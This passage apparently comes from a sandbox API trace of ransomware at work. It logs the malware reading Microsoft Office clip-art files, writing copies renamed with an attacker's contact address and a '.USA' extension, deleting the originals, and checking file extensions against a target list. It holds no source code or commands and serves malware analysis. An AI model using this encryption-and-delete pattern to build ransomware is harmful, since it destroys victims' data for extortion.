lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.952] WriteFile (in: hFile=0x3b0, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.952] SetEndOfFile (hFile=0x3b0) returned 1 [0272.952] CloseHandle (hObject=0x3b0) returned 1 [0272.952] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.952] SetEndOfFile (hFile=0x2b0) returned 1 [0272.954] CloseHandle (hObject=0x2b0) returned 1 [0272.954] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.954] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00669_.wmf")) returned 1 [0272.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63 [0272.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63 [0272.955] lstrlenW (lpString=".doc") returned 4 [0272.955] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.955] lstrlenW (lpString=".docx") returned 5 [0272.955] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.955] lstrlenW (lpString=".pdf") returned 4 [0272.955] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.955] lstrlenW (lpString=".xls") returned 4 [0272.955] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.955] lstrlenW (lpString=".xlsx") returned 5 [0272.955] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.955] lstrlenW (lpString=".ppt") returned 4 [0272.955] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63 [0272.955] lstrlenW (lpString=".zip") returned 4 [0272.955] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.955] lstrlenW (lpString=".rar") returned 4 [0272.955] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.955] lstrlenW (lpString=".bz2") returned 4 [0272.955] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.955] lstrlenW (lpString=".7z") returned 3 [0272.955] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63 [0272.955] lstrlenW (lpString=".dbf") returned 4 [0272.955] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63 [0272.955] lstrlenW (lpString=".1cd") returned 4 [0272.955] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63 [0272.956] lstrlenW (lpString=".jpg") returned 4 [0272.956] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63 [0272.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63 [0272.956] lstrlenW (lpString=".doc") returned 4 [0272.956] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.956] lstrlenW (lpString=".docx") returned 5 [0272.956] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.956] lstrlenW (lpString=".pdf") returned 4 [0272.956] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.956] lstrlenW (lpString=".xls") returned 4 [0272.956] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.956] lstrlenW (lpString=".xlsx") returned 5 [0272.956] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.956] lstrlenW (lpString=".ppt") returned 4 [0272.956] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63 [0272.956] lstrlenW (lpString=".zip") returned 4 [0272.956] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.956] lstrlenW (lpString=".rar") returned 4 [0272.956] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.956] lstrlenW (lpString=".bz2") returned 4 [0272.956] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.956] lstrlenW (lpString=".7z") returned 3 [0272.956] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63 [0272.956] lstrlenW (lpString=".dbf") returned 4 [0272.956] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63 [0272.956] lstrlenW (lpString=".1cd") returned 4 [0272.956] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 63 [0272.957] lstrlenW (lpString=".jpg") returned 4 [0272.957] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.957] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.957] lstrlenW (lpString="HH00688_.WMF") returned 12 [0272.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00688_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0272.957] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=7084) returned 1 [0272.957] CloseHandle (hObject=0x2b0) returned 1 [0272.957] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00688_.wmf")) returned 0x20 [0272.957] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00688_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00688_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0272.958] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.958] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00688_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0272.958] GetLastError () returned 0x0 [0272.958] ReadFile (in: hFile=0x2b0, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x1bac, lpOverlapped=0x0) returned 1 [0272.980] WriteFile (in: hFile=0x3b0, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x1bb0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x1bb0, lpOverlapped=0x0) returned 1 [0272.980] ReadFile (in: hFile=0x2b0, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.981] WriteFile (in: hFile=0x3b0, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.981] SetEndOfFile (hFile=0x3b0) returned 1 [0272.981] CloseHandle (hObject=0x3b0) returned 1 [0272.981] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.981] SetEndOfFile (hFile=0x2b0) returned 1 [0272.983] CloseHandle (hObject=0x2b0) returned 1 [0272.983] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.987] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00688_.wmf")) returned 1 [0273.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63 [0273.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63 [0273.011] lstrlenW (lpString=".doc") returned 4 [0273.011] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.011] lstrlenW (lpString=".docx") returned 5 [0273.012] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.012] lstrlenW (lpString=".pdf") returned 4 [0273.012] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.012] lstrlenW (lpString=".xls") returned 4 [0273.012] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.012] lstrlenW (lpString=".xlsx") returned 5 [0273.012] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.012] lstrlenW (lpString=".ppt") returned 4 [0273.012] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63 [0273.012] lstrlenW (lpString=".zip") returned 4 [0273.012] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.012] lstrlenW (lpString=".rar") returned 4 [0273.012] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.012] lstrlenW (lpString=".bz2") returned 4 [0273.012] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.012] lstrlenW (lpString=".7z") returned 3 [0273.012] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63 [0273.012] lstrlenW (lpString=".dbf") returned 4 [0273.012] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63 [0273.012] lstrlenW (lpString=".1cd") returned 4 [0273.012] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63 [0273.012] lstrlenW (lpString=".jpg") returned 4 [0273.012] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63 [0273.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63 [0273.012] lstrlenW (lpString=".doc") returned 4 [0273.013] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.013] lstrlenW (lpString=".docx") returned 5 [0273.013] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.013] lstrlenW (lpString=".pdf") returned 4 [0273.013] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.013] lstrlenW (lpString=".xls") returned 4 [0273.013] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.013] lstrlenW (lpString=".xlsx") returned 5 [0273.013] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.013] lstrlenW (lpString=".ppt") returned 4 [0273.013] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63 [0273.013] lstrlenW (lpString=".zip") returned 4 [0273.013] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.013] lstrlenW (lpString=".rar") returned 4 [0273.013] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.013] lstrlenW (lpString=".bz2") returned 4 [0273.013] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.013] lstrlenW (lpString=".7z") returned 3 [0273.013] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63 [0273.013] lstrlenW (lpString=".dbf") returned 4 [0273.013] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63 [0273.013] lstrlenW (lpString=".1cd") returned 4 [0273.013] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 63 [0273.013] lstrlenW (lpString=".jpg") returned 4 [0273.013] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.014] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.014] lstrlenW (lpString="HH01242_.WMF") returned 12 [0273.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01242_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0273.024] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=7340) returned 1 [0273.024] CloseHandle (hObject=0x3a8) returned 1 [0273.024] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01242_.wmf")) returned 0x20 [0273.046] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01242_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.047] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.047] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.047] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.047] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01242_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0273.047] GetLastError () returned 0x0 [0273.047] ReadFile (in: hFile=0x2b0, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x1cac, lpOverlapped=0x0) returned 1 [0273.056] WriteFile (in: hFile=0x3b0, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x1cb0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x1cb0, lpOverlapped=0x0) returned 1 [0273.057] ReadFile (in: hFile=0x2b0, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.057] WriteFile (in: hFile=0x3b0, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.057] SetEndOfFile (hFile=0x3b0) returned 1 [0273.057] CloseHandle (hObject=0x3b0) returned 1 [0273.057] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.057] SetEndOfFile (hFile=0x2b0) returned 1 [0273.059] CloseHandle (hObject=0x2b0) returned 1 [0273.059] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.059] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01242_.wmf")) returned 1 [0273.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63 [0273.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63 [0273.059] lstrlenW (lpString=".doc") returned 4 [0273.059] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.059] lstrlenW (lpString=".docx") returned 5 [0273.060] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.060] lstrlenW (lpString=".pdf") returned 4 [0273.060] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.060] lstrlenW (lpString=".xls") returned 4 [0273.060] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.060] lstrlenW (lpString=".xlsx") returned 5 [0273.060] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.060] lstrlenW (lpString=".ppt") returned 4 [0273.060] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63 [0273.060] lstrlenW (lpString=".zip") returned 4 [0273.060] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.060] lstrlenW (lpString=".rar") returned 4 [0273.060] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.060] lstrlenW (lpString=".bz2") returned 4 [0273.060] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.060] lstrlenW (lpString=".7z") returned 3 [0273.060] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63 [0273.060] lstrlenW (lpString=".dbf") returned 4 [0273.060] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63 [0273.060] lstrlenW (lpString=".1cd") returned 4 [0273.060] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63 [0273.060] lstrlenW (lpString=".jpg") returned 4 [0273.060] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63 [0273.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63 [0273.060] lstrlenW (lpString=".doc") returned 4 [0273.060] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.060] lstrlenW (lpString=".docx") returned 5 [0273.061] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.061] lstrlenW (lpString=".pdf") returned 4 [0273.061] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.061] lstrlenW (lpString=".xls") returned 4 [0273.061] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.061] lstrlenW (lpString=".xlsx") returned 5 [0273.061] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.061] lstrlenW (lpString=".ppt") returned 4 [0273.061] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63 [0273.061] lstrlenW (lpString=".zip") returned 4 [0273.061] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.061] lstrlenW (lpString=".rar") returned 4 [0273.061] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.061] lstrlenW (lpString=".bz2") returned 4 [0273.061] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.061] lstrlenW (lpString=".7z") returned 3 [0273.061] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63 [0273.061] lstrlenW (lpString=".dbf") returned 4 [0273.061] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63 [0273.061] lstrlenW (lpString=".1cd") returned 4 [0273.061] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 63 [0273.061] lstrlenW (lpString=".jpg") returned 4 [0273.061] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.061] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.062] lstrlenW (lpString="HH01759_.WMF") returned 12 [0273.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01759_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.062] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=5414) returned 1 [0273.062] CloseHandle (hObject=0x2b0) returned 1 [0273.062] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01759_.wmf")) returned 0x20 [0273.063] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01759_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.063] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01759_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.063] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.063] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.063] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01759_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0273.063] GetLastError () returned 0x0 [0273.063] ReadFile (in: hFile=0x2b0, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x1526, lpOverlapped=0x0) returned 1 [0273.064] WriteFile (in: hFile=0x3b0, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x1530, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x1530, lpOverlapped=0x0) returned 1 [0273.065] ReadFile (in: hFile=0x2b0, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.065] WriteFile (in: hFile=0x3b0, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.065] SetEndOfFile 